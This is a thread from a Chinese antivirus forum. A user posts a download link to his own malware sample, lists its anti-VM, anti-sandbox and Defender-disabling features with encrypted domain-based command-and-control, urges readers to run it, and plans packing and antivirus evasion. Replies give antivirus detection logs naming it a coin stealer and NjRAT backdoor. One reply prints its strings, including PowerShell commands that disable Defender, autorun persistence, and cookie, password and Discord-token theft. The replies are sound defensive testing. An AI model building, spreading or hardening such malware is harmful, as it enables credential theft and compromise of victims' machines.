查看: 2573|回复: 20
收起左侧

[病毒样本] 自己做的病毒样本已经更新2.0这次我忘加壳了

[复制链接]
adware
发表于 2024-3-5 12:13:33 来自手机 | 显示全部楼层 |阅读模式
本帖最后由 adware 于 2024-3-5 12:22 编辑

自己做的病毒样本更新了以下内容
1.反虚拟机
2反沙箱反调试
3通信以加密方式通信 AES128加密算法             4.自动关闭Windows defender  5通信地址改成了域名
6自动检测计算机中是否安装常见的反病毒软件
样本下载链接
https://www.123pan.com/s/FxRKVv-xTa6d.html
请不要攻击服务器 谢谢 这是我自己的服务器 上次就是你们有人攻击了我的服务器导致我服务器进入黑洞了大家测试一下有没有杀毒软件都报什么类型的病毒 而且我建议大家双击测试一下有什么问题可以跟我汇报一下下期更新内容 如下
1加UPX壳  
2加一点点的免杀
3 不知道加什么


Fadouse
发表于 2024-3-5 12:15:30 | 显示全部楼层
本帖最后由 Fadouse 于 2024-3-5 12:20 编辑

ESSP Kill
  1. 时间;扫描程序;对象类型;对象;检测;操作;用户;信息;哈希;此处首次所见
  2. 3/5/2024 12:14:38 PM;HTTP 过滤器;文件;https://59-47-225-43.pd1.123pan.cn:30443/download-cdn.123pan.cn/123-407/f485396b/1812865951-0/f485396b63ef51d191a209d8a8ada997/c-m27?v=5&t=1709698467&s=1709698467a0ba9288a792ab770780918746db862e&r=TPPV3F&bzc=2&bzs=313831323836353935313a34333434343930333a3133333132303a30&filename=Client.exe&x-mf-biz-cid=f49dda2b-f129-46e9-b465-09b5ad7708dd-47df1e&auto_redirect=0&ndcp=1&cache_type=1&xmfcid=6bffc7f7-d083-4f47-8552-722eeb125912-0-50111d3b1;MSIL/Agent.VC 蠕虫 的变量;连接已终止;LAPTOP\Fadouse;尝试通过应用程序访问 Web 时发生事件: C:\Program Files\Google\Chrome\Application\chrome.exe (14C5C90BFC51CA47843DF990F02942ED88871359).;5B7FFB98E01C3C44EBF43987B5BCEAF18E7D9EC0;3/5/2024 12:14:38 PM
复制代码
Kaspersky Plus Kill
  1. 事件: 检测到恶意对象
  2. 用户: LAPTOP\Fadouse
  3. 用户类型: 发起者
  4. 应用程序名称: explorer.exe
  5. 应用程序路径: C:\Windows
  6. 组件: 文件反病毒
  7. 结果说明: 检测到
  8. 类型: 木马
  9. 名称: HEUR:Trojan.Win32.Generic
  10. 精确度: 不确切
  11. 威胁级别: 高
  12. 对象类型: 文件
  13. 对象名称: Client.exe
  14. 对象路径: C:\Users\ASUS\Downloads
  15. 对象的 MD5: F485396B63EF51D191A209D8A8ADA997
  16. 原因: 专家分析
  17. 数据库发布日期: 昨天,3/4/2024 4:11:00 PM
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
adware
 楼主| 发表于 2024-3-5 12:16:41 来自手机 | 显示全部楼层
Fadouse 发表于 2024-3-5 12:15
ESSP 下载杀

这么牛逼的吗 昨天我测还不杀
Fadouse
发表于 2024-3-5 12:22:00 | 显示全部楼层
adware 发表于 2024-3-5 12:16
这么牛逼的吗 昨天我测还不杀

开高启发了吗?我eset调的的高启发+激进杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
UNknownOoo
发表于 2024-3-5 12:23:09 | 显示全部楼层
火绒
扫描:特征 1x
  1. 扫描文件:1
  2. 发现风险:1
  3. 已处理风险:1
  4. 病毒详情:
  5. 风险路径:C:\Users\UnknownOoo\Downloads\Client.exe, 病毒名:Trojan/MSIL.CoinStealer.c, 病毒ID:efa2c07bd2b7fe60, 处理结果:已处理,删除文件
复制代码
adware
 楼主| 发表于 2024-3-5 12:23:21 来自手机 | 显示全部楼层
Fadouse 发表于 2024-3-5 12:22
开高启发了吗?我eset调的的高启发+激进杀

没开 我就是下载好了马上就扫描 显示是安全的
adware
 楼主| 发表于 2024-3-5 13:41:17 来自手机 | 显示全部楼层
请问谁攻击了我的服务器
hhhq316
头像被屏蔽
发表于 2024-3-5 13:49:42 | 显示全部楼层
蜘蛛

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
DisaPDB
发表于 2024-3-5 14:02:40 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-3-6 18:11 编辑

火绒
  1. 病毒名称:Trojan/MSIL.CoinStealer.c
  2. 病毒ID:EFA2C07BD2B7FE60
  3. 病毒路径:C:\Users\Administrator\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00003a
  4. 操作类型:修改
  5. 操作结果:已处理,删除文件
复制代码
360
  1. 360杀毒扫描日志

  2. 病毒库日期:2024-03-04
  3. 扫描时间:2024-03-05 14:00:51
  4. 扫描用时:00:00:02
  5. 扫描类型:右键扫描
  6. 扫描文件总数:1
  7. 项目总数:1
  8. 清除项目数:1
  9. 扫描内容
  10. ----------------------
  11. C:\Users\Administrator\Downloads\Client.exe

  12. 扫描结果
  13. ======================
  14. 高危风险项
  15. ----------------------
  16. C:\Users\Administrator\Downloads\Client.exe        感染型病毒(Win32/Backdoor.NjRAT.HgIATUsA)        已删除

复制代码
免杀技术高超(
  1. powershell
  2. ExecuteScript
  3. ARMEAttack
  4. DeleteScript
  5. windows_update.exe
  6. Software\Microsoft\Windows\CurrentVersion\Run
  7. OpenPage
  8. [DropperName]
  9. Set-MpPreference -DisableBehaviorMonitoring $true
  10. displayName
  11. Uninstall
  12. DisableArchiveScanning
  13. ProgId
  14. StealCookie
  15. ARME Attack Started
  16. Information
  17. HTTPGetAttack
  18. Discord Token =
  19. File has been uploaded and executed
  20. ProgramList.txt
  21. Malwarebytes Anti-Malware
  22. History Stealer has been executed
  23. /create /f /sc ONSTART /RL HIGHEST /tn "'
  24. User installed program list has been uploaded
  25. regshot
  26. /scripts/
  27. Logoff
  28. StartKeylogger
  29. \discord\Local Storage\leveldb\
  30. DisableAntiSpyware
  31. @c,C+WCsfI
  32. AdvancedProcessController
  33. cookies.sqlite
  34. RetryCancel
  35. RControlKey
  36. apateDNS
  37. Bandwidth Flood Attack Stopped
  38. History.txt
  39. UDP Attack Stopped
  40. [SPACE]
  41. POST / HTTP/1.1
  42. LShiftKey
  43. Get-MpPreference -verbose
  44. Set-MpPreference -DisablePrivacyMode $true
  45. ??/??/??
  46. &explorer /root,"%CD%
  47. ChromePasswords.txt
  48. Screenshot
  49. } ###
  50. ~!@#$%^&*()+-/><
  51. ProcessEye
  52. FileDescription
  53. VS_VERSION_INFO
  54. Comments
  55. Microsoft Corporation. All rights reserved.
  56. ProductName
  57. Microsoft
  58. FileVersion
  59. 000004b0
  60. svchost.exe
  61. Windows
  62. Assembly Version
  63. OriginalFilename
  64. VarFileInfo
  65. Host Process for Windows Services
  66. CompanyName
  67. Windows Update Assistant
  68. ProductVersion
  69. StringFileInfo
  70. 10.0.18362.1
  71. LegalCopyright
  72. Operating System
  73. Translation
复制代码
有点意图过于明显了



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
骨灰级小白
发表于 2024-3-5 14:22:16 | 显示全部楼层
没有检测毛豆吗

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-1 12:28 , Processed in 0.127914 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表